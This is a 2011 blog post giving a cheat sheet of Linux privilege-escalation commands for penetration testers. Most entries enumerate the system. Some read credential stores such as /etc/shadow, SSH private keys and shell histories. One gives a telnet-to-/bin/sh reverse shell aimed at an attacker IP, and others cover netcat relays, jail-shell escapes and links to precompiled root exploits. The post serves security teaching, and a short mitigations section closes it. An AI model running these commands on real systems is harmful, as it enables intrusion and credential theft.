<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Privilege-Escalation-Linux</title>
</head><body>RSS<br/>
Search<br/>
BlogArchivesScriptsVideos<br/>
Basic Linux Privilege Escalation<br/>
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic &amp; rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail".<br/>
<br/>
Enumeration is the key.<br/>
<br/>
(Linux) privilege escalation is all about:<br/>
<br/>
Collect - Enumeration, more enumeration and some more enumeration.<br/>
Process - Sort through data, analyse and prioritisation.<br/>
Search - Know what to search for and where to find the exploit code.<br/>
Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".<br/>
Try - Get ready for (lots of) trial and error.<br/>
Operating System<br/>
<br/>
What's the distribution type? What version?<br/>
<br/>
cat /etc/issue<br/>
cat /etc/*-release<br/>
&nbsp; cat /etc/lsb-release &nbsp; &nbsp; &nbsp;# Debian based<br/>
&nbsp; cat /etc/redhat-release &nbsp; # Redhat based<br/>
What's the kernel version? Is it 64-bit?<br/>
<br/>
cat /proc/version<br/>
uname -a<br/>
uname -mrs<br/>
rpm -q kernel<br/>
dmesg | grep Linux<br/>
ls /boot | grep vmlinuz-<br/>
What can be learnt from the environmental variables?<br/>
<br/>
cat /etc/profile<br/>
cat /etc/bashrc<br/>
cat ~/.bash_profile<br/>
cat ~/.bashrc<br/>
cat ~/.bash_logout<br/>
env<br/>
set<br/>
Is there a printer?<br/>
<br/>
lpstat -a<br/>
Applications &amp; Services<br/>
<br/>
What services are running? Which service has which user privilege?<br/>
<br/>
ps aux<br/>
ps -ef<br/>
top<br/>
cat /etc/services<br/>
Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!<br/>
<br/>
ps aux | grep root<br/>
ps -ef | grep root<br/>
What applications are installed? What version are they? Are they currently running?<br/>
<br/>
ls -alh /usr/bin/<br/>
ls -alh /sbin/<br/>
dpkg -l<br/>
rpm -qa<br/>
ls -alh /var/cache/apt/archivesO<br/>
ls -alh /var/cache/yum/<br/>
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?<br/>
<br/>
cat /etc/syslog.conf<br/>
cat /etc/chttp.conf<br/>
cat /etc/lighttpd.conf<br/>
cat /etc/cups/cupsd.conf<br/>
cat /etc/inetd.conf<br/>
cat /etc/apache2/apache2.conf<br/>
cat /etc/my.conf<br/>
cat /etc/httpd/conf/httpd.conf<br/>
cat /opt/lampp/etc/httpd.conf<br/>
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/<br/>
What jobs are scheduled?<br/>
<br/>
crontab -l<br/>
ls -alh /var/spool/cron<br/>
ls -al /etc/ | grep cron<br/>
ls -al /etc/cron*<br/>
cat /etc/cron*<br/>
cat /etc/at.allow<br/>
cat /etc/at.deny<br/>
cat /etc/cron.allow<br/>
cat /etc/cron.deny<br/>
cat /etc/crontab<br/>
cat /etc/anacrontab<br/>
cat /var/spool/cron/crontabs/root<br/>
Any plain text usernames and/or passwords?<br/>
<br/>
grep -i user [filename]<br/>
grep -i pass [filename]<br/>
grep -C 5 "password" [filename]<br/>
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" &nbsp; # Joomla<br/>
Communications &amp; Networking<br/>
<br/>
What NIC(s) does the system have? Is it connected to another network?<br/>
<br/>
/sbin/ifconfig -a<br/>
cat /etc/network/interfaces<br/>
cat /etc/sysconfig/network<br/>
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?<br/>
<br/>
cat /etc/resolv.conf<br/>
cat /etc/sysconfig/network<br/>
cat /etc/networks<br/>
iptables -L<br/>
hostname<br/>
dnsdomainname<br/>
What other users &amp; hosts are communicating with the system?<br/>
<br/>
lsof -i<br/>
lsof -i :80<br/>
grep 80 /etc/services<br/>
netstat -antup<br/>
netstat -antpx<br/>
netstat -tulpn<br/>
chkconfig --list<br/>
chkconfig --list | grep 3:on<br/>
last<br/>
w<br/>
Whats cached? IP and/or MAC addresses<br/>
<br/>
arp -e<br/>
route<br/>
/sbin/route -nee<br/>
Is packet sniffing possible? What can be seen? Listen to live traffic<br/>
<br/>
1<br/>
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21<br/>
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]<br/>
<br/>
Have you got a shell? Can you interact with the system?<br/>
<br/>
nc -lvp 4444 &nbsp; &nbsp;# Attacker. Input (Commands)<br/>
nc -lvp 4445 &nbsp; &nbsp;# Attacker. Ouput (Results)<br/>
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 &nbsp; &nbsp;# On the targets system. Use the attackers IP!<br/>
Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/<br/>
<br/>
Is port forwarding possible? Redirect and interact with traffic from another view<br/>
<br/>
Note: http://www.boutell.com/rinetd/<br/>
<br/>
Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch<br/>
<br/>
Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip<br/>
<br/>
Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]<br/>
<br/>
<br/>
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7<br/>
Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]<br/>
<br/>
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 &nbsp; &nbsp;# Local Port<br/>
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 &nbsp; &nbsp;# Remote Port<br/>
Note: mknod backpipe p ; nc -l -p [remote port] &lt; backpipe | nc [local IP] [local port] &gt;backpipe<br/>
<br/>
mknod backpipe p ; nc -l -p 8080 &lt; backpipe | nc 10.5.5.151 80 &gt;backpipe &nbsp; &nbsp;# Port Relay<br/>
mknod backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1&gt;backpipe &nbsp; &nbsp;# Proxy (Port 80 to 8080)<br/>
mknod backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc localhost 80 | tee -a outflow &amp; 1&gt;backpipe &nbsp; &nbsp;# Proxy monitor (Port 80 to 8080)<br/>
Is tunnelling possible? Send commands locally, remotely<br/>
<br/>
ssh -D 127.0.0.1:9050 -N [username]@[ip]<br/>
proxychains ifconfig<br/>
Confidential Information &amp; Users<br/>
<br/>
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?<br/>
<br/>
id<br/>
who<br/>
w<br/>
last<br/>
cat /etc/passwd | cut -d: -f1 &nbsp; &nbsp;# List of users<br/>
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' &nbsp; # List of super users<br/>
awk -F: '($3 == "0") {print}' /etc/passwd &nbsp; # List of super users<br/>
cat /etc/sudoers<br/>
sudo -l<br/>
What sensitive files can be found?<br/>
<br/>
cat /etc/passwd<br/>
cat /etc/group<br/>
cat /etc/shadow<br/>
ls -alh /var/mail/<br/>
Anything "interesting" in the home directorie(s)? If it's possible to access<br/>
<br/>
ls -ahlR /root/<br/>
ls -ahlR /home/<br/>
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords<br/>
<br/>
cat /var/apache2/config.inc<br/>
cat /var/lib/mysql/mysql/user.MYD<br/>
cat /root/anaconda-ks.cfg<br/>
What has the user being doing? Is there any password in plain text? What have they been edting?<br/>
<br/>
cat ~/.bash_history<br/>
cat ~/.nano_history<br/>
cat ~/.atftp_history<br/>
cat ~/.mysql_history<br/>
cat ~/.php_history<br/>
What user information can be found?<br/>
<br/>
cat ~/.bashrc<br/>
cat ~/.profile<br/>
cat /var/mail/root<br/>
cat /var/spool/mail/root<br/>
Can private-key information be found?<br/>
<br/>
cat ~/.ssh/authorized_keys<br/>
cat ~/.ssh/identity.pub<br/>
cat ~/.ssh/identity<br/>
cat ~/.ssh/id_rsa.pub<br/>
cat ~/.ssh/id_rsa<br/>
cat ~/.ssh/id_dsa.pub<br/>
cat ~/.ssh/id_dsa<br/>
cat /etc/ssh/ssh_config<br/>
cat /etc/ssh/sshd_config<br/>
cat /etc/ssh/ssh_host_dsa_key.pub<br/>
cat /etc/ssh/ssh_host_dsa_key<br/>
cat /etc/ssh/ssh_host_rsa_key.pub<br/>
cat /etc/ssh/ssh_host_rsa_key<br/>
cat /etc/ssh/ssh_host_key.pub<br/>
cat /etc/ssh/ssh_host_key<br/>
File Systems<br/>
<br/>
Which configuration files can be written in /etc/? Able to reconfigure a service?<br/>
<br/>
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2&gt;/dev/null &nbsp; &nbsp; # Anyone<br/>
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2&gt;/dev/null &nbsp; &nbsp; &nbsp; # Owner<br/>
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2&gt;/dev/null &nbsp; &nbsp;# Group<br/>
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2&gt;/dev/null &nbsp; &nbsp; &nbsp; &nbsp;# Other<br/>
<br/>
find /etc/ -readable -type f 2&gt;/dev/null &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Anyone<br/>
find /etc/ -readable -type f -maxdepth 1 2&gt;/dev/null &nbsp; # Anyone<br/>
What can be found in /var/ ?<br/>
<br/>
ls -alh /var/log<br/>
ls -alh /var/mail<br/>
ls -alh /var/spool<br/>
ls -alh /var/spool/lpd<br/>
ls -alh /var/lib/pgsql<br/>
ls -alh /var/lib/mysql<br/>
cat /var/lib/dhcp3/dhclient.leases<br/>
Any settings/files (hidden) on website? Any settings file with database information?<br/>
<br/>
<br/>
ls -alhR /var/www/<br/>
ls -alhR /srv/www/htdocs/<br/>
ls -alhR /usr/local/www/apache22/data/<br/>
ls -alhR /opt/lampp/htdocs/<br/>
ls -alhR /var/www/html/<br/>
Is there anything in the log file(s) (Could help with "Local File Includes"!)<br/>
<br/>
cat /etc/httpd/logs/access_log<br/>
cat /etc/httpd/logs/access.log<br/>
cat /etc/httpd/logs/error_log<br/>
cat /etc/httpd/logs/error.log<br/>
cat /var/log/apache2/access_log<br/>
cat /var/log/apache2/access.log<br/>
cat /var/log/apache2/error_log<br/>
cat /var/log/apache2/error.log<br/>
cat /var/log/apache/access_log<br/>
cat /var/log/apache/access.log<br/>
cat /var/log/auth.log<br/>
cat /var/log/chttp.log<br/>
cat /var/log/cups/error_log<br/>
cat /var/log/dpkg.log<br/>
cat /var/log/faillog<br/>
cat /var/log/httpd/access_log<br/>
cat /var/log/httpd/access.log<br/>
cat /var/log/httpd/error_log<br/>
cat /var/log/httpd/error.log<br/>
cat /var/log/lastlog<br/>
cat /var/log/lighttpd/access.log<br/>
cat /var/log/lighttpd/error.log<br/>
cat /var/log/lighttpd/lighttpd.access.log<br/>
cat /var/log/lighttpd/lighttpd.error.log<br/>
cat /var/log/messages<br/>
cat /var/log/secure<br/>
cat /var/log/syslog<br/>
cat /var/log/wtmp<br/>
cat /var/log/xferlog<br/>
cat /var/log/yum.log<br/>
cat /var/run/utmp<br/>
cat /var/webmin/miniserv.log<br/>
cat /var/www/logs/access_log<br/>
cat /var/www/logs/access.log<br/>
ls -alh /var/lib/dhcp3/<br/>
ls -alh /var/log/postgresql/<br/>
ls -alh /var/log/proftpd/<br/>
ls -alh /var/log/samba/<br/>
<br/>
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp<br/>
Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/<br/>
<br/>
If commands are limited, you break out of the "jail" shell?<br/>
<br/>
python -c 'import pty;pty.spawn("/bin/bash")'<br/>
echo os.system('/bin/bash')<br/>
/bin/sh -i<br/>
How are file-systems mounted?<br/>
<br/>
mount<br/>
df -h<br/>
Are there any unmounted file-systems?<br/>
<br/>
1<br/>
cat /etc/fstab<br/>
What "Advanced Linux File Permissions" are used? Sticky bits, SUID &amp; GUID<br/>
<br/>
<br/>
find / -perm -1000 -type d 2&gt;/dev/null &nbsp; # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.<br/>
find / -perm -g=s -type f 2&gt;/dev/null &nbsp; &nbsp;# SGID (chmod 2000) - run as the group, not the user who started it.<br/>
find / -perm -u=s -type f 2&gt;/dev/null &nbsp; &nbsp;# SUID (chmod 4000) - run as the owner, not the user who started it.<br/>
<br/>
find / -perm -g=s -o -perm -u=s -type f 2&gt;/dev/null &nbsp; &nbsp;# SGID or SUID<br/>
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null; done &nbsp; &nbsp;# Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)<br/>
<br/>
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)<br/>
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2&gt;/dev/null<br/>
Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm<br/>
<br/>
<br/>
find / -writable -type d 2&gt;/dev/null &nbsp; &nbsp; &nbsp;# world-writeable folders<br/>
find / -perm -222 -type d 2&gt;/dev/null &nbsp; &nbsp; # world-writeable folders<br/>
find / -perm -o w -type d 2&gt;/dev/null &nbsp; &nbsp; # world-writeable folders<br/>
<br/>
find / -perm -o x -type d 2&gt;/dev/null &nbsp; &nbsp; # world-executable folders<br/>
<br/>
find / \( -perm -o w -perm -o x \) -type d 2&gt;/dev/null &nbsp; # world-writeable &amp; executable folders<br/>
Any "problem" files? Word-writeable, "nobody" files<br/>
<br/>
<br/>
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print &nbsp; # world-writeable files<br/>
find /dir -xdev \( -nouser -o -nogroup \) -print &nbsp; # Noowner files<br/>
Preparation &amp; Finding Exploit Code<br/>
<br/>
What development tools/languages are installed/supported?<br/>
<br/>
find / -name perl*<br/>
find / -name python*<br/>
find / -name gcc*<br/>
find / -name cc<br/>
How can files be uploaded?<br/>
<br/>
1<br/>
2<br/>
3<br/>
4<br/>
5<br/>
find / -name wget<br/>
find / -name nc*<br/>
find / -name netcat*<br/>
find / -name tftp*<br/>
find / -name ftp<br/>
Finding exploit code<br/>
<br/>
http://www.exploit-db.com<br/>
<br/>
http://1337day.com<br/>
<br/>
http://www.securiteam.com<br/>
<br/>
http://www.securityfocus.com<br/>
<br/>
http://www.exploitsearch.net<br/>
<br/>
http://metasploit.com/modules/<br/>
<br/>
http://securityreason.com<br/>
<br/>
http://seclists.org/fulldisclosure/<br/>
<br/>
http://www.google.com<br/>
<br/>
Finding more information regarding the exploit<br/>
<br/>
http://www.cvedetails.com<br/>
<br/>
http://packetstormsecurity.org/files/cve/[CVE]<br/>
<br/>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]<br/>
<br/>
http://www.vulnview.com/cve-details.php?cvename=[CVE]<br/>
<br/>
(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk<br/>
<br/>
http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/<br/>
<br/>
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/<br/>
<br/>
Mitigations<br/>
<br/>
Is any of the above information easy to find?<br/>
<br/>
Try doing it! Setup a cron job which automates script(s) and/or 3rd party products<br/>
<br/>
Is the system fully patched?<br/>
<br/>
Kernel, operating system, all applications, their plugins and web services<br/>
<br/>
1<br/>
2<br/>
apt-get update &amp;&amp; apt-get upgrade<br/>
yum update<br/>
Are services running with the minimum level of privileges required?<br/>
<br/>
For example, do you need to run MySQL as root?<br/>
<br/>
Scripts Can any of this be automated?!<br/>
<br/>
http://pentestmonkey.net/tools/unix-privesc-check/<br/>
<br/>
http://labs.portcullis.co.uk/application/enum4linux/<br/>
<br/>
http://bastille-linux.sourceforge.net<br/>
<br/>
Other (quick) guides &amp; Links<br/>
<br/>
Enumeration<br/>
<br/>
http://www.0daysecurity.com/penetration-testing/enumeration.html<br/>
<br/>
http://www.microloft.co.uk/hacking/hacking3.htm<br/>
<br/>
Misc<br/>
<br/>
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf<br/>
<br/>
http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf<br/>
<br/>
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html<br/>
<br/>
Posted by g0tmi1kAug 2nd, 2011 12:00 am bypassing, commands, privilege escalation<br/>
<br/>
« Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)De-ICE.net v1.2a (1.20a) {Level 1 - Disk 3 - Version A} »<br/>
<br/>
</body></html>